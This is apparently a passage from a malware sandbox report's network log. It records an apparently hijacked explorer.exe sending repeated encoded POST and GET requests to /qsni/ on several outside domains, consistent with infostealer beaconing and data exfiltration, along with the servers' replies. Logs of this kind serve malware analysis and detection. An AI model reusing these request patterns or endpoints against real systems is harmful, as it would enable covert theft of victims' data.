                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.eylien.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.eylien.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 64 64 73 6e 31 38 73 70 49 30 52 48 36 47 6d 41 73 63 63 73 41 4f 50 79 37 64 45 52 32 4d 75 74 33 32 37 51 75 30 59 31 76 79 52 2d 45 58 66 56 72 79 72 7a 4a 59 51 78 71 44 38 50 52 6a 34 6d 54 69 59 61 6f 36 57 58 73 37 6d 67 48 6a 38 54 51 6e 78 76 69 4b 57 55 31 62 5a 59 62 6e 33 39 57 36 62 47 43 4e 41 4d 6b 68 37 4a 56 58 4a 42 75 43 36 73 52 45 70 67 6f 4c 6a 79 4d 49 6b 6b 34 58 39 37 32 31 39 4c 55 44 54 33 49 2d 46 4f 45 64 53 65 52 47 47 6e 4b 79 68 75 73 75 36 52 64 4c 4d 6b 47 33 72 5a 6a 5a 69 79 34 68 43 67 69 6a 61 79 4e 32 4d 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=ddsn18spI0RH6GmAsccsAOPy7dER2Mut327Qu0Y1vyR-EXfVryrzJYQxqD8PRj4mTiYao6WXs7mgHj8TQnxviKWU1bZYbn39W6bGCNAMkh7JVXJBuC6sREpgoLjyMIkk4X97219LUDT3I-FOEdSeRGGnKyhusu6RdLMkG3rZjZiy4hCgijayN2M.
                                                                                          Mar 30, 2023 10:26:08.976933956 CEST319INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:26:08 GMT
                                                                                          Server: Apache/2.4.56 (Unix)
                                                                                          Content-Length: 196
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          38192.168.2.64974581.169.145.6680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:11.539109945 CEST321OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.eylien.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.eylien.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.eylien.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 64 64 73 6e 31 38 73 70 49 30 52 48 36 6d 57 41 75 5f 30 73 48 75 50 7a 31 39 45 52 6a 63 76 6b 33 33 48 51 75 78 6f 66 76 48 42 2d 45 67 44 56 72 51 54 7a 4c 59 51 78 39 54 38 44 4d 7a 35 6a 54 6d 78 72 6f 5f 72 69 73 34 4b 67 64 45 77 54 53 6c 5a 73 71 61 57 61 78 62 5a 62 62 6e 32 5f 57 38 37 5a 43 4e 4d 31 6b 68 6a 4a 56 6c 68 42 6f 79 36 74 65 6b 70 67 6f 4c 6a 32 4d 49 6b 68 34 58 6b 38 32 30 6c 39 55 31 58 33 47 5f 6c 4f 43 36 48 49 58 47 47 6a 55 69 68 39 39 4c 4c 63 62 34 38 68 51 32 79 36 38 49 36 4f 35 52 4f 77 77 54 36 76 4d 6a 61 6d 75 46 51 31 7a 79 4f 43 6b 51 31 4b 38 37 4e 6a 7e 33 34 6b 69 42 4d 39 67 47 6f 62 34 32 58 72 6c 39 68 4f 61 78 59 4e 45 62 35 43 47 4f 35 59 39 39 55 74 6d 6d 28 53 52 32 71 43 28 37 75 53 73 53 4c 4b 33 47 51 38 56 33 38 36 4b 49 39 67 53 76 50 56 43 65 56 59 6c 70 31 6d 46 72 4a 7a 68 72 6c 41 44 45 75 52 48 7a 59 4c 46 43 31 6c 57 56 62 75 31 58 34 4c 38 6f 30 2d 54 4c 75 42 28 41 77 78 6a 70 50 2d 6c 34 30 79 37 2d 31 68 53 6b 73 42 44 6c 6e 63 7e 5f 33 6d 42 79 6f 51 36 79 70 56 55 6d 43 34 45 7a 51 78 7e 37 56 7a 49 61 39 52 6b 5a 61 38 4b 75 47 4c 4e 77 6d 56 53 4d 58 2d 43 48 35 63 72 4a 79 30 62 54 63 72 73 68 4e 44 73 31 4a 4f 76 44 76 57 4b 35 7a 42 4c 34 4e 59 43 35 30 68 44 66 6e 43 55 61 51 79 71 48 46 6e 35 49 72 48 65 58 4c 7a 6e 4b 33 68 28 71 74 64 55 5a 35 30 55 30 43 61 4e 4a 66 74 31 65 37 37 32 44 30 31 51 62 51 4c 54 6b 6e 59 51 54 6c 76 7e 72 7e 62 7e 32 56 43 50 4d 6b 75 57 62 32 71 37 56 51 37 4e 30 30 37 4b 48 79 41 6a 5f 62 54 55 53 6a 55 45 66 32 78 46 5f 6f 46 45 70 4a 6a 39 45 48 38 49 57 67 2d 44 6b 49 72 39 53 74 75 39 58 36 7a 63 58 66 42 4d 77 77 64 7a 39 46 50 4a 6f 69 77 4f 45 63 4d 71 51 31 41 65 6e 30 35 4f 38 62 6a 7e 76 61 74 4f 4c 57 63 73 5f 6e 6a 76 53 5a 6e 58 41 54 4f 75 68 4b 30 39 56 32 4d 5a 6d 71 45 28 36 54 69 79 45 6d 79 56 5a 72 63 4e 31 49 44 53 69 4a 54 6e 5a 31 2d 6d 30 58 32 55 79 42 52 48 6c 79 4a 4d 78 6f 6d 51 64 36 47 71 44 78 38 43 49 45 6e 6a 6c 38 4a 51 71 56 31 67 63 79 78 72 57 66 6f 76 34 54 71 36 4a 6c 39 32 63 50 58 33 72 51 35 52 6b 42 6d 72 7a 5a 69 35 51 28 2d 56 49 7a 6d 79 57 38 39 42 50 59 58 35 4a 6a 46 50 33 6d 42 70 4c 6f 35 51 65 32 51 70 52 4c 4e 38 68 65 39 30 31 73 74 78 70 32 51 67 39 58 4c 49 42 46 4e 51 73 65 4b 50 4e 46 4c 33 79 6f 34 51 74 71 43 30 2d 67 41 44 48 58 54 6e 5a 45 6d 4e 45 7a 38 4d 52 35 76 73 62 69 48 47 63 6c 67 28 56 4e 51 30 61 6c 38 31 76 71 39 4e 59 46 6e 59 54 69 62 57 6e 59 75 66 72 6b 4f 37 33 73 37 69 68 6f 66 46 2d 4f 48 55 63 5a 30 5a 38 6c 5f 4e 61 33 78 44 5a 78 75 6d 76 38 4a 4b 56 67 45 42 37 55 6e 4b 77 61 63 46 61 34 42 57 42 71 55 28 5f 6c 47 36 54 59 33 79 53 48 57 58 6c 63 5f 4c 62 51 45 35 53 41 58 45 35 7a 4f 46 73 4c 7a 28 56 65 77 58 6e 35 5f 49 43 79 68 6f 6a 58 6b 6a 69 46 6f 56 33 6a 4d 54 5a 39 59 77 56 6b 4f 39 62 4b 74 5a 4f 6f 78 53 6f 41 73 45 75 49 41 59 6b 46 78 39 42 69 46 55 2d 4e 41 54 4c 33 70 4a 62 28 47 57 43 45 43 4f 57 7a 36 54 6f 64 38 57 39 76 58 36 75 51 6d 66 37 47 55 43 47 48 64 6b 79 51 5f 72 68 7a 6a 6c 62 49 55 64 68 65 64 45 2d 34 6b 4e 47 6a 47 4d 41 46 71 4b 77 7a 46 48 79 68 67 76 30 32 46 41 4e 4a 46 67 2d 34 50 6a 49 4e 52 6c 37 31 6e 75 49 66 75 30 76 28 34 77 72 45 6a 69 62 66 47 4c 5a 4e 69 63 67 61 4d 61 61 65 7a 56 73 6f 44 6a 52 37 58 54 68 70 6e 4d 6c 52 67 49 4e 77 2d 4e 6f 5a 31 6a 4a 78 31 61 66 6d 5f 71 5a 6c 53 57 6c 58 76 45 41 6b 46 6a 41 36 2d 30 45 7e 70 31 5f 75 57 65 55 4c 52 73 46 4d 47 62 38 51 45 4e 30 4d 4f 70 35 58 44 53 77 49 57 4f 39 6b 42 57 44 39 79 63 4f 54 49 41 64 64 51 45 63 72 6e 61 59 76 6b 73 61 77 4b 71 64 62 69 71 6d 74 70 7e 76 6f 34 72 5f 5a 33 43 44 34 4f 4e 65 47 33 6a 53 6c 31 43 30 66 47 39 74 7e 77 37 63 4b 34 65 76 38 36 67 42 41 5a 42 64 76 58 57 57 67 6b 57 38 77 55 4f 37 6f 57 65 2d 6e 32 6e 6a 68 41 70 66 46 57 6b 34 46 4c 57 44 69 30 7e 69 50 78 51 38 33 51 39 47 41 41 6f 71 70 43 32 36 4a 77 7e 57 6b 46 44 75 55 43 6d 6e 70 31 6d 70 7e 52 57 69 47 64 72 48 4c 69 4d 7a 50 36 46 6b 79 59 45 4e 36 73 6d 6e 43 49 75 33 62 65 43 39 43 77 59 4f 69 61 44 77 51 62
                                                                                          Data Ascii: C6=ddsn18spI0RH6mWAu_0sHuPz19ERjcvk33HQuxofvHB-EgDVrQTzLYQx9T8DMz5jTmxro_ris4KgdEwTSlZsqaWaxbZbbn2_W87ZCNM1khjJVlhBoy6tekpgoLj2MIkh4Xk820l9U1X3G_lOC6HIXGGjUih99LLcb48hQ2y68I6O5ROwwT6vMjamuFQ1zyOCkQ1K87Nj~34kiBM9gGob42Xrl9hOaxYNEb5CGO5Y99Utmm(SR2qC(7uSsSLK3GQ8V386KI9gSvPVCeVYlp1mFrJzhrlADEuRHzYLFC1lWVbu1X4L8o0-TLuB(AwxjpP-l40y7-1hSksBDlnc~_3mByoQ6ypVUmC4EzQx~7VzIa9RkZa8KuGLNwmVSMX-CH5crJy0bTcrshNDs1JOvDvWK5zBL4NYC50hDfnCUaQyqHFn5IrHeXLznK3h(qtdUZ50U0CaNJft1e772D01QbQLTknYQTlv~r~b~2VCPMkuWb2q7VQ7N007KHyAj_bTUSjUEf2xF_oFEpJj9EH8IWg-DkIr9Stu9X6zcXfBMwwdz9FPJoiwOEcMqQ1Aen05O8bj~vatOLWcs_njvSZnXATOuhK09V2MZmqE(6TiyEmyVZrcN1IDSiJTnZ1-m0X2UyBRHlyJMxomQd6GqDx8CIEnjl8JQqV1gcyxrWfov4Tq6Jl92cPX3rQ5RkBmrzZi5Q(-VIzmyW89BPYX5JjFP3mBpLo5Qe2QpRLN8he901stxp2Qg9XLIBFNQseKPNFL3yo4QtqC0-gADHXTnZEmNEz8MR5vsbiHGclg(VNQ0al81vq9NYFnYTibWnYufrkO73s7ihofF-OHUcZ0Z8l_Na3xDZxumv8JKVgEB7UnKwacFa4BWBqU(_lG6TY3ySHWXlc_LbQE5SAXE5zOFsLz(VewXn5_ICyhojXkjiFoV3jMTZ9YwVkO9bKtZOoxSoAsEuIAYkFx9BiFU-NATL3pJb(GWCECOWz6Tod8W9vX6uQmf7GUCGHdkyQ_rhzjlbIUdhedE-4kNGjGMAFqKwzFHyhgv02FANJFg-4PjINRl71nuIfu0v(4wrEjibfGLZNicgaMaaezVsoDjR7XThpnMlRgINw-NoZ1jJx1afm_qZlSWlXvEAkFjA6-0E~p1_uWeULRsFMGb8QEN0MOp5XDSwIWO9kBWD9ycOTIAddQEcrnaYvksawKqdbiqmtp~vo4r_Z3CD4ONeG3jSl1C0fG9t~w7cK4ev86gBAZBdvXWWgkW8wUO7oWe-n2njhApfFWk4FLWDi0~iPxQ83Q9GAAoqpC26Jw~WkFDuUCmnp1mp~RWiGdrHLiMzP6FkyYEN6smnCIu3beC9CwYOiaDwQbunxHaOrYKIIohNkrtoPqCrYJzXTuwp3WsLO37jWIoMRSslZpndW3vPdgt6EiZ4SEOQqr1mK2jDQHNsfrcoFQ1kU.
                                                                                          Mar 30, 2023 10:26:11.559953928 CEST322INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:26:11 GMT
                                                                                          Server: Apache/2.4.56 (Unix)
                                                                                          Content-Length: 196
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          39192.168.2.64974681.169.145.6680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:14.091861963 CEST322OUTGET /qsni/?C6=QfEH2LlQJkhao1qhydFpLuO03+YyqoCU3gb+yzoLlx0bdVzB1Ri3UMkYiWEqIQkbZVoV1sjk8Mu+D1IodnZSi5GE+4Z2R1bARZG0EKwNnHKl&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.eylien.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:26:14.114164114 CEST323INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:26:14 GMT
                                                                                          Server: Apache/2.4.56 (Unix)
                                                                                          Content-Length: 196
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          4192.168.2.64971181.17.29.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:23:59.530241013 CEST109OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.pgatraining.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.pgatraining.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.pgatraining.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 28 6e 6a 72 39 76 6c 45 35 33 49 62 76 51 38 39 72 71 52 41 4c 4b 56 67 55 43 73 4e 53 62 67 68 6d 55 28 56 53 5a 33 58 53 45 6b 5f 34 64 61 78 4a 2d 52 51 6a 33 4b 4d 47 39 63 31 43 65 4b 4f 57 4c 71 32 62 31 4c 33 4e 37 55 46 5a 53 62 5a 54 75 65 63 73 55 7a 65 44 4c 36 32 38 41 4c 45 53 4e 68 4d 53 53 4b 4c 78 77 69 74 5a 4f 50 39 49 70 58 5a 50 5a 74 73 7e 6f 65 70 78 59 59 72 4c 74 63 58 7e 53 4d 76 6c 62 77 37 44 61 56 72 33 56 67 37 6b 63 4e 51 65 4a 56 42 30 33 62 6e 78 38 71 6d 4a 44 44 72 63 4e 51 78 37 72 39 61 6b 68 57 38 4c 43 63 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=(njr9vlE53IbvQ89rqRALKVgUCsNSbghmU(VSZ3XSEk_4daxJ-RQj3KMG9c1CeKOWLq2b1L3N7UFZSbZTuecsUzeDL628ALESNhMSSKLxwitZOP9IpXZPZts~oepxYYrLtcX~SMvlbw7DaVr3Vg7kcNQeJVB03bnx8qmJDDrcNQx7r9akhW8LCc.
                                                                                          Mar 30, 2023 10:23:59.554888964 CEST109INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Thu, 30 Mar 2023 08:23:59 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=388a7580-ced4-11ed-94f4-5ad27b7f62fd; path=/; domain=.pgatraining.com; expires=Tue, 17 Apr 2091 11:38:06 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          40192.168.2.64974745.32.200.25480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:19.719599962 CEST324OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.goosedigitals.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.goosedigitals.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.goosedigitals.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 6c 4e 61 4c 63 67 73 54 28 56 62 57 70 52 52 39 66 63 58 69 70 62 31 69 33 2d 64 4d 59 77 41 32 69 77 71 42 44 51 53 50 53 6b 46 32 75 48 4d 71 63 39 64 6a 47 58 62 33 32 6d 34 53 4e 6b 6e 52 49 6e 4f 71 69 36 52 71 35 59 39 32 47 77 70 51 68 76 32 55 6b 6b 73 5f 31 67 34 74 4f 59 43 42 59 38 32 67 33 5a 75 39 38 48 44 2d 70 5f 38 4e 63 48 6a 68 79 69 73 49 70 52 55 44 42 4c 54 68 79 39 77 6e 37 6a 7e 62 77 6c 6f 7a 66 35 4a 62 66 76 6c 50 55 4f 6b 79 38 56 46 47 37 38 6e 67 73 68 4a 61 77 61 66 52 6d 37 37 39 4f 45 42 5f 52 64 72 72 4f 37 30 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=lNaLcgsT(VbWpRR9fcXipb1i3-dMYwA2iwqBDQSPSkF2uHMqc9djGXb32m4SNknRInOqi6Rq5Y92GwpQhv2Ukks_1g4tOYCBY82g3Zu98HD-p_8NcHjhyisIpRUDBLThy9wn7j~bwlozf5JbfvlPUOky8VFG78ngshJawafRm779OEB_RdrrO70.
                                                                                          Mar 30, 2023 10:26:19.862185955 CEST325INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:26:19 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.goosedigitals.com/qsni/
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          41192.168.2.64974845.32.200.25480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:22.399391890 CEST327OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.goosedigitals.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.goosedigitals.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.goosedigitals.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 6c 4e 61 4c 63 67 73 54 28 56 62 57 34 42 68 39 64 37 44 69 6f 37 31 68 35 65 64 4d 52 51 41 79 69 77 6d 42 44 56 71 6c 53 57 70 32 74 55 30 71 63 66 46 6a 56 48 62 33 6e 47 34 57 44 45 6e 39 49 6e 61 63 69 37 68 36 35 64 6c 32 55 68 35 51 77 64 65 54 38 6b 73 35 28 41 34 79 4f 59 43 55 59 38 47 6b 33 5a 6a 31 38 48 62 2d 71 4a 49 4e 59 48 69 33 75 79 73 49 70 52 56 52 42 4c 53 77 79 37 59 4a 37 68 4f 79 77 54 73 7a 59 64 56 62 59 4d 64 4d 57 4f 6b 32 67 6c 45 6d 37 63 6e 70 67 58 63 45 6d 5f 54 42 7a 59 76 32 4c 47 51 48 44 64 33 31 59 76 47 31 52 76 35 59 52 45 5a 4c 72 5f 6b 4d 52 46 54 61 41 5f 72 66 6f 43 59 6d 71 5f 34 32 43 45 7a 33 4c 57 55 6a 47 43 50 59 6d 4a 6b 66 71 58 79 63 73 69 37 49 63 30 68 4e 4a 77 61 45 34 50 4f 5f 34 61 61 4e 74 51 69 6d 7e 44 7e 31 6c 4b 67 62 6e 4b 28 44 49 6d 52 68 49 4d 42 62 74 39 41 63 48 6d 68 50 58 74 39 53 36 39 51 6c 6c 42 48 30 4a 78 47 30 38 37 4d 78 55 72 67 55 44 78 4b 62 35 45 61 41 70 51 7a 73 6b 42 6f 79 50 36 41 48 49 61 43 53 39 4e 64 6d 79 4b 76 6f 34 71 6f 65 58 39 78 31 42 33 6d 49 55 44 6e 4e 5a 4e 6e 37 34 65 7e 47 38 59 69 57 69 52 73 66 62 4c 31 33 6a 55 55 4d 41 36 6c 49 77 61 38 37 65 38 38 54 54 43 4a 4e 31 45 76 48 7e 6c 59 77 59 58 36 48 34 6c 50 33 50 38 75 4b 47 4a 61 59 72 49 6f 61 66 36 53 45 6c 34 50 56 34 61 64 65 35 50 43 53 4f 4e 65 32 4b 45 56 69 72 53 43 46 70 49 68 63 49 5a 77 45 28 39 46 39 4d 57 44 75 37 73 36 38 4a 4d 73 33 72 65 6a 49 42 61 72 67 47 35 72 47 67 33 30 63 31 68 79 4d 52 52 61 77 37 38 71 72 76 4d 7e 39 75 34 6b 35 4c 5a 72 54 35 68 50 4f 44 68 4f 70 38 65 5a 74 58 30 43 62 72 4d 6e 59 77 4a 71 46 38 75 65 38 41 67 58 43 6c 4c 7a 73 72 55 6c 66 55 4f 33 31 6f 4a 4f 67 38 63 42 6d 52 79 4f 37 42 73 63 71 53 2d 28 4f 49 6e 4f 48 6f 70 61 41 70 64 6a 37 6b 66 68 78 51 75 62 46 59 6d 6b 5a 48 54 77 47 58 50 45 6f 6f 79 46 66 4e 4c 35 67 6a 69 39 51 4c 67 66 4e 65 74 50 32 6c 58 4c 5f 62 70 6f 6d 44 74 4a 35 47 72 70 52 64 33 4f 38 77 4f 7a 51 68 65 37 6e 35 65 66 4f 4d 78 35 4a 56 45 56 56 6d 70 63 57 37 5f 57 4e 75 76 64 61 59 58 62 57 71 36 45 62 4b 54 59 51 70 6e 59 44 4a 6c 59 2d 78 79 4e 48 68 4b 7e 32 65 34 78 79 54 79 77 41 6a 54 65 6c 69 6b 70 48 42 38 6e 79 45 65 52 69 34 74 30 57 4e 49 54 49 58 48 28 34 4d 64 49 4d 53 37 63 70 52 4e 71 65 32 70 71 68 4d 33 66 73 6a 50 41 6b 45 44 4a 51 4c 44 33 62 35 42 31 38 7e 76 41 75 44 6b 73 7a 6b 49 7e 71 39 4b 7a 32 34 61 64 38 33 31 79 66 47 4d 4d 5a 43 5f 55 61 51 75 6b 58 67 45 4b 2d 45 6b 4d 41 64 50 70 6b 51 41 75 55 66 45 4e 2d 32 33 30 56 6b 49 38 78 50 52 7a 2d 7e 71 4d 32 66 45 46 34 79 46 72 33 32 56 44 37 72 39 53 54 64 5a 30 72 4f 43 34 50 72 66 6c 5f 7a 36 4d 69 4d 4f 76 2d 64 5a 58 78 68 55 71 44 63 47 73 76 65 32 68 4f 64 31 51 6a 67 75 6c 6d 63 59 6c 75 68 4d 38 73 44 68 55 46 6a 44 5a 48 4f 48 49 6a 47 71 4d 6c 6f 4d 44 64 44 51 72 34 75 38 61 6c 33 51 59 55 38 4e 56 7a 6f 32 32 49 69 63 6c 62 43 52 47 4e 30 6a 46 71 68 33 61 64 67 73 63 78 6a 51 6b 57 70 62 4c 42 44 33 4e 6b 6e 7a 49 5f 6e 4e 28 59 57 5f 4c 52 6b 6a 6b 36 7e 37 59 47 4a 66 54 57 73 6b 78 59 70 67 28 47 63 62 69 57 64 6f 42 44 71 64 69 69 7a 74 66 62 54 72 33 5f 65 71 59 7a 36 35 68 50 4b 72 45 36 43 5a 39 52 4b 41 52 36 59 45 73 2d 6b 37 4b 65 78 4f 49 6f 70 55 35 53 30 57 45 6d 4a 49 43 4c 6e 6c 76 6d 49 42 53 38 4a 75 78 63 4e 34 49 53 52 64 7a 59 69 49 38 76 55 5f 69 71 69 33 70 55 4a 59 6a 51 36 65 37 2d 53 6e 38 53 47 61 46 44 50 49 53 7a 6b 51 64 55 38 48 59 46 37 52 33 61 30 63 53 7a 79 43 59 38 4d 42 4d 6e 51 5a 7a 61 7a 31 77 4f 73 30 47 6d 51 4a 54 6f 63 5a 71 55 67 6c 65 77 32 36 28 49 28 64 64 73 46 42 76 79 48 6d 34 32 35 77 28 53 38 4c 6a 75 36 79 33 45 39 38 69 31 69 4d 65 6d 36 65 65 49 74 46 31 6d 72 65 65 4f 51 6e 61 6c 48 33 6d 46 65 34 41 35 45 6d 72 72 36 59 43 69 30 34 76 61 73 6f 73 69 5a 34 6a 73 7e 56 70 73 4f 43 39 64 4c 68 6a 4a 53 62 5a 38 73 33 64 6d 68 71 6a 49 67 5f 67 48 35 35 62 6b 66 41 78 47 56 6a 36 44 41 4a 35 4b 4b 4c 44 43 45 52 41 69 6d 47 53 5f 4f 72 34 71 6d 35 76 6b 57 5f 31 6e 6c 76 4a 45 43 79 62 63 66 62 77 46 31 75 58 6f 77 6f 43 70
